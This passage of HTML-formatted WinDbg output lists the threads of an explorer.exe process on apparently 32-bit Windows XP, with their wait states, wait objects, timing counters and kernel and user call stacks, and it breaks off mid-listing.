7ffdf000 Win32Thread: e1d9b2d8 WAIT: (WrUserRequest) UserMode <br /><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">Non-Alertable<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 826fee88 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> <span style="color: #0000ff">Not</span> impersonating<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DeviceMap e1cba0b0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Owning Process 827f9020 Image: explorer.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Attached Process N/A Image: N/A<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Wait Start TickCount 696150 Ticks: 643 (0:00:00:10.046)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Context Switch Count 5674 LargeStack<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> UserTime 00:00:00.078<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> KernelTime 00:00:01.000<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Win32 Start Address Explorer!ModuleEntry (0x0101e24e)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Start Address kernel32!BaseProcessStartThunk (0x7c810867)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Stack Init f80d7000 Current f80d6cb0 Base f80d7000 Limit f80d1000 <span style="color: #0000ff">Call</span> 0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Priority 12 BasePriority 8 PriorityDecrement 2 DecrementCount 16<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> ChildEBP RetAddr <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> f80d6cc8 8050017a nt!KiSwapContext+0x2e (FPO: [Uses EBP] [0,0,4])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> f80d6cd4 804f99be nt!KiSwapThread+0x46 (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> f80d6cfc bf802ec4 nt!KeWaitForSingleObject+0x1c2 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">WARNING: Frame IP <span style="color: #0000ff">not</span> <span style="color: #0000ff">in</span> any known module. Following frames may be wrong.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> f80d6d5c 8053c808 0xbf802ec4<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> f80d6d5c 0000003b nt!KiFastCallEntry+0xf8 (FPO: [0,0] TrapFrame-EDITED @ f80d6d4c)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 8053c804 0d8be58b 0x3b<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 8053c808 ffdff124 0xd8be58b<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 8053c80c 893c558b 0xffdff124<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 8053c810 00013491 0x893c558b<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 8053c814 45f7fa00 0x13491<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 8053c818 02000070 0x45f7fa00<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 8053c81c f6067500 0x2000070<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 8053c820 74016c45 0xf6067500<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 8053c824 241d8b57 0x74016c45<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 8053c828 c6ffdff1 0x241d8b57<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 8053c82c 80002e43 0xc6ffdff1<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 8053c830 74004a7b 0x80002e43<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 8053c834 89dd8b47 0x74004a7b<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 8053c838 43c74443 0x89dd8b47<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 8053c83c 00000000 0x43c74443<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> THREAD 826fdb88 Cid 0594.05b0 Teb: 7ffdc000 Win32Thread: e195f8b8 WAIT: (WrUserRequest) UserMode <br /><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">Non-Alertable<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 82451220 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> <span style="color: #0000ff">Not</span> impersonating<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DeviceMap e1cba0b0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Owning Process 827f9020 Image: explorer.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Attached Process N/A Image: N/A<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Wait Start TickCount 696780 Ticks: 13 (0:00:00:00.203)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Context Switch Count 134374 LargeStack<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> UserTime 00:00:01.359<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> KernelTime 00:00:12.546<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Win32 Start Address SHLWAPI!WrapperThreadProc (0x77f7f56f)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Start Address kernel32!BaseThreadStartThunk (0x7c810856)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Stack Init b29a9000 Current b29a8cb0 Base b29a9000 Limit b29a3000 <span style="color: #0000ff">Call</span> 0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Priority 11 BasePriority 9 PriorityDecrement 0 DecrementCount 16<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> ChildEBP RetAddr <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b29a8cc8 8050017a nt!KiSwapContext+0x2e (FPO: [Uses EBP] [0,0,4])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b29a8cd4 804f99be nt!KiSwapThread+0x46 (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b29a8cfc bf802ec4 nt!KeWaitForSingleObject+0x1c2 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">WARNING: Frame IP <span style="color: #0000ff">not</span> <span style="color: #0000ff">in</span> any known module. Following frames may be wrong.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b29a8d5c 8053c808 0xbf802ec4<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b29a8d5c 0000003b nt!KiFastCallEntry+0xf8 (FPO: [0,0] TrapFrame-EDITED @ b29a8d4c)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 8053c804 0d8be58b 0x3b<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 8053c808 ffdff124 0xd8be58b<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 8053c80c 893c558b 0xffdff124<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 8053c810 00013491 0x893c558b<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 8053c814 45f7fa00 0x13491<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 8053c818 02000070 0x45f7fa00<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 8053c81c f6067500 0x2000070<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 8053c820 74016c45 0xf6067500<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 8053c824 241d8b57 0x74016c45<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 8053c828 c6ffdff1 0x241d8b57<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 8053c82c 80002e43 0xc6ffdff1<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 8053c830 74004a7b 0x80002e43<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 8053c834 89dd8b47 0x74004a7b<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 8053c838 43c74443 0x89dd8b47<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 8053c83c 00000000 0x43c74443<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> THREAD 82453680 Cid 0594.05b8 Teb: 7ffdb000 Win32Thread: 00000000 WAIT: (DelayExecution) UserMode <br /><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">Alertable<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 82453770 NotificationTimer<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> <span style="color: #0000ff">Not</span> impersonating<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DeviceMap e1cba0b0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Owning Process 827f9020 Image: explorer.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Attached Process N/A Image: N/A<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Wait Start TickCount 696150 Ticks: 643 (0:00:00:10.046)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Context Switch Count 193 <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> UserTime 00:00:00.000<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> KernelTime 00:00:00.015<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Win32 Start Address ntdll!RtlpTimerThread (0x7c92798d)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Start Address kernel32!BaseThreadStartThunk (0x7c810856)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Stack Init b29ed000 Current b29eccbc Base b29ed000 Limit b29ea000 <span style="color: #0000ff">Call</span> 0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Priority 10 BasePriority 8 PriorityDecrement 0 DecrementCount 16<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> ChildEBP RetAddr <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b29eccd4 8050017a nt!KiSwapContext+0x2e (FPO: [Uses EBP] [0,0,4])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b29ecce0 804f93fb nt!KiSwapThread+0x46 (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b29ecd0c 8060b2f5 nt!KeDelayExecutionThread+0x1c9 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b29ecd54 8053c808 nt!NtDelayExecution+0x87 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b29ecd54 7c90eb94 nt!KiFastCallEntry+0xf8 (FPO: [0,0] TrapFrame @ b29ecd64)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 00fbff98 7c90d85c ntdll!KiFastSystemCallRet (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 00fbff9c 7c9279d4 ntdll!NtDelayExecution+0xc (FPO: [2,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 00fbffb4 7c80b50b ntdll!RtlpTimerThread+0x47 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 00fbffec 00000000 kernel32!BaseThreadStart+0x37 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> THREAD 826f6670 Cid 0594.05c0 Teb: 7ffd8000 Win32Thread: 00000000 WAIT: (UserRequest) UserMode <br /><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">Alertable<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 822dd9e0 NotificationTimer<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 82453a18 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 826f0708 NotificationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 82498508 NotificationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 82810860 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 828ba380 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 821b12c8 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 8227a608 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 820e2608 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 821ec1b0 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 821ed7c0 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 82164698 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 82481708 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 825d2c40 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 8278cfc8 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 828a7638 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 821583c8 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 822ea740 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 823bac58 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 8265fe30 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 829e1514 NotificationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 82518fc0 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> <span style="color: #0000ff">Not</span> impersonating<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> DeviceMap e1cba0b0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Owning Process 827f9020 Image: explorer.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Attached Process N/A Image: N/A<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Wait Start TickCount 696150 Ticks: 643 (0:00:00:10.046)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Context Switch Count 18 <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> UserTime 00:00:00.000<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> KernelTime 00:00:00.000<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Win32 Start Address ntdll!RtlpWaitThread (0x7c929fae)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Start Address kernel32!BaseThreadStartThunk (0x7c810856)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Stack Init b29e1000 Current b29e095c Base b29e1000 Limit b29de000 <span style="color: #0000ff">Call</span> 0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Priority 10 BasePriority 8 PriorityDecrement 2 DecrementCount 16<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> ChildEBP RetAddr <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b29e0974 8050017a nt!KiSwapContext+0x2e (FPO: [Uses EBP] [0,0,4])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b29e0980 804f973e nt!KiSwapThread+0x46 (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b29e09b8 805b4d6a nt!KeWaitForMultipleObjects+0x284 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b29e0d48 8053c808 nt!NtWaitForMultipleObjects+0x2a2 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b29e0d48 7c90eb94 nt!KiFastCallEntry+0xf8 (FPO: [0,0] TrapFrame @ b29e0d64)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0113fce8 7c90e9ab ntdll!KiFastSystemCallRet (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0113fcec 7c92a0d5 ntdll!ZwWaitForMultipleObjects+0xc (FPO: [5,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0113ffb4 7c80b50b ntdll!RtlpWaitThread+0x13d (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0113ffec 00000000 kernel32!BaseThreadStart+0x37 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> THREAD 827456b8 Cid 0594.0614 Teb: 7ffd7000 Win32Thread: e1fa7eb0 WAIT: (UserRequest) UserMode <br /><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">Alertable<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 8218a7cc NotificationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 821abb74 NotificationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 825d8084 NotificationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 825cf5a4 NotificationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 82741f7c NotificationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 8263025c NotificationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 824a8b54 NotificationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 8266ae0c NotificationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 8268d7c4 NotificationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 822ae084 NotificationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 823ae25c NotificationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 8282497c NotificationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 82450084 NotificationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 828aa3e4 NotificationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 82456ef0 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> IRP List:<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 82205190: (0006,01b4) Flags: 00000000 Mdl: 00000000<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 821d73d0: (0006,01b4) Flags: 00000000 Mdl: 00000000<br /></pre><pre style="font-size: 12px; 